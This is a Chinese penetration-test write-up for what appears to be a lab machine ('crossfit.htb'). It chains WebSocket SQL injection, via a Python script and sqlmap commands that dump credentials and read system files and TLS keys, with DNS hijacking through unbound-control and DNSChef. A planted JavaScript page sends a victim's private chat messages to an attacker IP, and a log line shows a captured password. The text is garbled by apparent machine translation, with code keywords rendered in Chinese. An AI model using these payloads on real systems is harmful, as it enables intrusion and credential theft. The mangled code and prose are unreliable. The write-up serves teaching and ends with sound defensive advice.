本次渗透实战的主要流程为:
1、信息收集,发现WebSocket接口;
2、使用burp对WebSocket接口进行测试,发现存在sql注入漏洞;
3、写中转注入脚本,通过sqlmap跑出数据库内容,并读取重要的配置文件;
4、通过未绑定搭建DNS服务器 结合之前的配置文件 使用dnschef进行DNS调查;
5、DNS流量劫持后获取了用户密码。
主要的知识点在于:基于Web Socket接口的中转注入 DNS服务器的搭建与现状 下面开始商业渗透实战之旅。
信息收集
有真实的ip 那上来肯定是端口扫描一波 看看哪些服务:
单从端口上看 重点应该在网络服务上 解锁这个服务在详细介绍。
在来一波目录扫描:
发现一些登录页面 逐一尝试并没有取得突破。
wfuzz -u http://10.10.10.232 -H 主机:FUZZ.crossfit.htb” -w /root/Desktop/domain.txt
发现了几个子域 在etc/hosts文件里添加上:
10.10.10.232 crossfit.htb雇员.crossfit.htbgym.crossfit.htb crossfit-club.htb
逐个点开观察 终于在打嗝里看到了一个地球的东西;
接触前的少 一波资料后 简单介绍如下:
网络套接字
初次接触 WebSocket 的人 都问同样的问题:我们已经有了 HTTP 协议 为什么还需要另一个协议?能带来什么好处?
答案很简单 因为 HTTP 协议有一个缺陷:通信只能由客户端发起。
举例来说 我们想了解今天的天气 只能是客户端向服务器发出请求 服务器返回不到结果。
HTTP 协议做服务器主动向客户端发送信息。
我们单向请求的获知 偷窥了如果服务器有持续的状态变化 客户端要就非常麻烦我们。的信息。最精彩的场景就是聊天室。
轮询的效率低,非常浪费资源 因为必须不停连接 或者 HTTP 连接总是打开。因此 工程师们一直在寻找
有没有更好的方法。WebSocket 就是这样发明的。
它的最大特点就是 服务器可以主动向客户端发送信息 客户端也可以主动向服务器发送信息
是真正的对外传播技术的一种。
现在回到我们本次网络;
- python3 -m websockets ws://gym.crossfit.htb/ws/
- python3 -m websockets ws://10.10.10.232/ws/
实际测试这两个效果是一样的 都可以看到这种json格式的数据联想到就是sql注入 命令执行 反序列化等。
burp可以抓到websockets的包 感叹神器的厂商
还可以进行修改;
最终测试医学参数参数存在注入,上sqlmap失效,不能在自己写脚本。
sqlmap中转注入
先用直接sqlmap跑:
- sqlmap --url "ws://10.10.10.232/ws/" --data='{"params":"help","token":"a5
- e6c5aade60a2c46198932182
- 80a45d2a142e3bcf583c8e19593f'-b's
无法成功。
看下payload;(直观概括理解)
一次多次都没有成功 经过详细研究了ws协议的传输过程 写了一个中转脚本;
经历过程中发现 修改 具体过程不在赘述 大家看就明白了。
看下有效载荷:
- sqlmap -u http://127.0.0.1:9000/?id=1 --dbs --level 5 --risk 3
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "员工" -T 员工 -C 用户名 --dump
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "员工" -T 员工 -C 密码 --dump
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "员工" -T 员工 -C 电子邮件 --dump
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "员工" -T 员工 -C email,
- token --dump --fresh-queries --threads 10
这里还可以读取文件,通过血管需要;
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /etc/httpd. conf
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /etc/passwd
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /var/unbound/ etc/unbound.conf
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /var/unbound/ etc/tls/unbound_server.key
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /var/unbound/ etc/tls/unbound_control.pem
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /var/unbound/ etc/tls/unbound_control.key
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /var/unbound/ etc/tls/unbound_server.pem
- sqlmap -u http://127.0.0.1:9000/?id=1 --level 5 --risk 3 -D "crossfit" -T "membership_
- plans" -C "password" --file-read /etc/relayd.配置文件
不用sqlmap的脚本:
- #!/usr/bin/python3
- 导入json
- 从 websocket 导入 create_connection
- ws = create_connection("ws://10.10.10.232/ws/")
- r = ws.recv()
- t = json.loads(r)['token']
- print("# 打印 "employees" 表格以获取电子邮件 ... ")
- ws.send("{"message":"available","params":"0 UNION ALL SELECT 1,GROUP_CONCAT(id,' ',userna
- me,' ',password,' ',email ) 来自employees.employees---","token":"" + t + ""}")
- r = ws.recv()
- t = json.loads(r)['token']
- 打印 ("{:<2} {:<13} {:<64} {:<32}".format("id","username","password","email"))
- 对于 l in r[r.index("name: ")+6:len(r)-3].split(","):
- a = l.split(" ")
- 打印 ("{:<2} {:<13} {:<64} {:<32}".format(a[0],a[1],a[2],a[3]))
- print("\n#正在下载"/var/unbound/etc/unbound.conf"文件...", end="")
- ws.send("{"message":"available","params":"0 UNION ALL SELECT 1,HEX(LOAD_FILE('/var/unb
- ound/etc/unbound.conf')) -- -","token":"" + t + ""}")
- r = ws.recv()
- t = json.loads(r)['token']
- with open('unbound.conf', 'w') as f:
- f.write(bytearray.fromhex(r[r.index("name:")+6:len(r)-3]).decode())
- 打印(“完成”)
- print("# 正在下载"/var/unbound/db/root.key" 文件...", end="")
- ws.send("{"message":"available","params":"0 UNION ALL SELECT 1,HEX(LOAD_FILE('/var/unbo
- und/db/root.key')) -- -","token":"" + t + ""}")
- r = ws.recv()
- t = json.loads(r)['token']
- with open('root.key', 'w') as f:
- f.write(bytearray.fromhex(r[r.index("name:")+6:len(r)-3]).decode())
- 打印(“完成”)
- print("# 正在下载"/var/unbound/etc/tls/unbound_server.pem" 文件...", end="")
- ws.send("{"message":"available","params":"0 UNION ALL SELECT 1,HEX(LOAD_FILE('/var/
- unbound/etc/tls/unbound_server.pem' ))-- -","token":"" + t + ""}")
- r = ws.recv()
- t = json.loads(r)['token']
- with open('unbound_server.pem', 'w') as f:
- f.write(bytearray.fromhex(r[r.index("name:")+6:len(r)-3]).decode())
- 打印(“完成”)
- print("#正在下载"/var/unbound/etc/tls/unbound_control.key"文件...", end="")
- ws.send("{"message":"available","params":"0 UNION ALL SELECT 1,HEX(LOAD_FILE('/var/unb
- ound/etc/tls/unbound_control.key' ))-- -","token":"" + t + ""}")
- r = ws.recv()
- t = json.loads(r)['token']
- with open('unbound_control.key', 'w') as f:
- f.write(bytearray.fromhex(r[r.index("name:")+6:len(r)-3]).decode())
- 打印(“完成”)
- print("#正在下载"/var/unbound/etc/tls/unbound_control.pem"文件...", end="")
- ws.send("{"message":"available","params":"0 UNION ALL SELECT 1,HEX(LOAD_FILE('/var/un
- bound/etc/tls/unbound_control.pem' ))-- -","token":"" + t + ""}")
- r = ws.recv()
- with open('unbound_control.pem', 'w') as f:
- f.write(bytearray.fromhex(r[r.index("name:")+6:len(r)-3]).decode())
- 打印(“完成”)
- ws.close()
运行后结果如下:
一个用户名和哈希 破解波没有结果卡住了。
之后再次查看namp的扫描结果 到8953端口运行未绑定的服务 就了解了详细的资料 了解了基本的使用
时间和原理结合sqlmap可以读取文件,将未绑定的所有配置文件读取到本地,可以冒充DNS服务 实现
DNS服务。下面逐步实现:
无界搭建DNS服务器
unbound是假相对简单的DNS服务软件 相对于bind9的
复杂配置更适合构建DNS服务器使用。
这里只做简单的一个使用的基本介绍 便于了解浏览的思路。
先看看配置文件(渗透作对各种配置文件要有深刻的理解):
- 配置unbound.conf文件
- 服务器:
- 冗长:1
- num-threads: 2 #线程数
- interface: 127.0.0.1 #监听地址(一般写本机内网ip)
- 接口:::0
- 端口:53#端口
- so-re-useport: yes #为每个线程的粒子查询打开专用侦听。可以同步地将分发分发到线程
- cache-min-ttl: 60 #解析最小缓存时间
- cache-max-ttl: 600 #解析最大缓存时间
- 传出范围:8192
- access-control: 10.0.0.0/8 allow #access control(允许10段ip访问本机)
- access-control: 127.0.0.1/8 allow #允许本机访问
- access-control: ::0/0 allow #允许ipv6网段访问
- 预取:是的#消息检测元素在它们周边之前被预取保持是最新的
- do-ip4:是的
- do-ip6:是的
- do-udp:是的
- do-tcp: 是
- so-rcvbuf:8m
- so-sndbuf:8m
- msg-cache-size: 64m #消息缓存的字节数。实际值为4 MB。
- rrset-cache-size: 128m #RRset缓存的字节数。
- Outgoing-num-tcp: 256 #为每个线程分配的传出TCP数据
- coming-num-tcp: 102 为线程的#TCP4数据
- include: "zone.conf" #zone.conf文件内容为解析内容,如local-data: "m.baidu.com
- A 192.168.10.1",也可以使用下面注释的方式配置解析
- # local-data: "m.baidu.com 600 A 192.168.10.1" #其中600为解析查找时间
- #Python:
- 远程控制:#这个区间为未绑定控制设置。如下配置内容可以控制未绑定服务
- 利用未绑定控制命令该服务执行开启、关闭、重启等操作。
- 控制启用:是
- 控制接口:127.0.0.1
- 控制端口:8953
- 服务器密钥文件:“/usr/local/unbound/etc/unbound/unbound_server.key”
- 服务器证书文件:“/usr/local/unbound/etc/unbound/unbound_server.pem”
- 控制密钥文件:“/usr/local/unbound/etc/unbound/unbound_control.key”
- 控制证书文件:“/usr/local/unbound/etc/unbound/unbound_control.pem”
- forward-zone:#这个区间为转发设置
- 名称: ”。”
- 转发地址:8.8.8.8
启动服务
首先执行./sbin/unbound-checkconf检查配置文件语法 确认无误后进行下一步;
执行/sbin/unbound-control-setup生成秘钥之后才能
使用/sbin/unbound-control命令;
最后执行./sbin/unbound启动服务。
Linux客户端测试。在客户端修改/etc/resolv.conf文件将DNS服务器的IP地址
引导上述所配置的授权DNS服务器的IP地址。
使用nslookup命令验证DNS查询结果
可见我们的DNS服务已经运行成功。
在本次渗透中没有那么复杂 根据上面的测试能力理解软件
的运行效果就可以了接下来继续我们的渗透:
在kali里运行:
sudo apt 安装未绑定
新建文件:
触摸 local_zones.conf
之前下载的unbound的配置文件unbound.conf如下:
修改为自己的路径:
在kali的apache2网页目录下写入如下2个文件:
- echo "<html><head></head><body><script>window.location="http://xcrossfit.htb/g
- o.html";</script><p>重定向...< /p></body></html>" > /var/www/html/password-reset.php
- echo "<html><head><script src="http://crossfit-club.htb/socket.io/socket.io.js"></script><script>var
- s = io.connect( "http://crossfit-club.htb");s.emit("user_join", { username : "Admin" });s.on("private_r
- ecv", (d) = > {var xhr = new XMLHttpRequest();xhr.open("GET", "http://10.10.16.9/get.php?s=" + bto
- a(JSON.stringify(d)), true );xhr.send();});</script></head><body><p>正在获取数据...</p></body></htm
- l>" > /var/www/html /go.html
开启apache2服务;
服务 apache2 启动
访问测试下:
没问题 下面开启DNS服务;
unbound-control 的基本命令格式:
unbound-control -c my_unbound.conf -s 10.10.10.232@8953 forwar
d_add +i some.attacker.htb。<your_ip>@53
在kali终端里运行:
unbound-control -c ./unbound.conf -s 10.10.10.232@8953 forward_add +i x
employees.crossfit.htb10.10.16.14@53;睡2;
unbound-control -c ./unbound.conf -s 10.10.10.232@8953 forward_add +i xcrossfit.htb。10.10.16.14@53
在主持人里把这两个市场也包括在内;
- 10.10.10.232 crossfit.htb雇员.crossfit.htbgym.crossfit.htb crossfit-club
- .htb xcrossfit.htb xemployees.crossfit.htb
DNS调查
这里使用DNSChef软件软件来进行DNS调查 下载地址:https : //github.com/iphelix/dnschef
DNSChef 旨在为渗透测试人员和恶意软件提供一个高度可配置的 DNS 代理。
DNS 代理(也称为“假 DNS”)是用于应用程序的程序
网络流量分析以及其他用途的工具。例如 DNS代理可以用于应对 badguy.com 的请求能够引导本地
机器来或终止拦截,而不是桌面互联网上的某个真实主机。
先测试下基本用语:
窗口修改dns服务器:
dnschef --fakeip=192.168.200.2 --fakedomains=www.baidu.com,
www.qq.com --interface 192.168.200.243
fackip调查到指定的ip,facedomains调查域名
成功实现了DNS。
在本次渗透测试中运行如下命令:
- python3 dnschef.py -i 10.10.16.14 --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1
- --count 2; 睡眠 1; python3 dnschef.py -i 10.10.16.14 --fakedomains xcrossfit.htb,xemployees
- .crossfit.htb --fakeip 10.10.16.14
这里透的思路就是:既然我们获取了目标服务器的DNS配置文件,那我们就利用未绑定的搭建一个DNS服务器 配置与目标
服务器相同。在利用DNSChef工具来进行DNS检查,将受害机器的DNS流量全部引导到我们自己搭建的DNS服务器上实现
了流量的劫持,并可以对关键进行拦截与分析,引导受害机器运行我们定义的恶意数据代码。
获取用户密码
利用前面获取的用户名,在kali终端里运行:
- curl -s -X "POST" -H "Host: xemployees.crossfit.htb" -H "Content-Type: applic
- ation/x-www-form-urlencoded" -d "email=david.palmer%40crossfit.htb" " http
- ://10.10.10.232/password-reset.php"
看下DNSChef的运行情况:
查看apache日志/var/log/apache2/access.log 就可以发现;
- 10.10.10.232 - - [19 /月/ 2021:21:03:31 -0400] “GET /get.php?s=eyJzZW5kZXJfaWQiO
- jIsImNvbnRlbnQiOiJIZWxsbyBEYXZpZCwgSSd2ZSBhZGRlZCBhIHVzZXIgYWNjb3VudCBmb3Ig
- eW91IHdpdGggdGhlIHBhc3N3b3JkIGBOV0JGY1NlM3dzNFZEaFRCYC4iLCJyb29tSWQiOjIsIl9p
- ZCI6MjcxOX0= HTTP / 1.1” 404 489 “HTTP://xcrossfit.htb/go.html” "Mozilla/5.0 (X11; O
- penBSD amd64; rv:82.0) Gecko/20100101 Firefox/82.0"
对部分base64解码后可得:
获取了用户的密码,然后ssh登录:
至此 本次渗透就暂告一段落 话题的提权主要是利用可利用的方法进行的 不是本篇文章的
主题网上各种例子也很多,这里就不赘述了。
后记
对于SQL注入 现在的实战中已经很难找到原生态的SQL注入了 遇到的基本都是需要改造或转换的。从SQL注入本质
来理解就是指网络程序应用对用户输入数据的合法性性没有可以在网络应用程序中预先确定好的查询语句的最后添
加的SQL语句来实现数据库服务器非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入以塑料形态或协
议 是http注入或websocket最终回归到本质,就是要对用户的输入进行合法性,SQL注入检测的方式或只是协议载
体用户起决定作用的还是的输入。
因此思想 为了预防利用websocket进行SQL注入可以采用两种方法:
一是加强对用户输入内容的检查与验证;
二是强迫使用参数化语句来传递用户输入的内容。
在本次渗透实战中如果没有SQL注入漏洞 就无法获取DNS服务器的配置文件 自然还是无法实现DNS服务但内核对用
户输入数据的合法性判断 导致SQL注入漏洞的存在 与websocket协议没有直接的关系 本文仅提供了一种基于
websocket协议进行SQL注入的方法 并在此基础上实现了DNS追踪,流程有亮点 记录下来与大家共同学习。 |
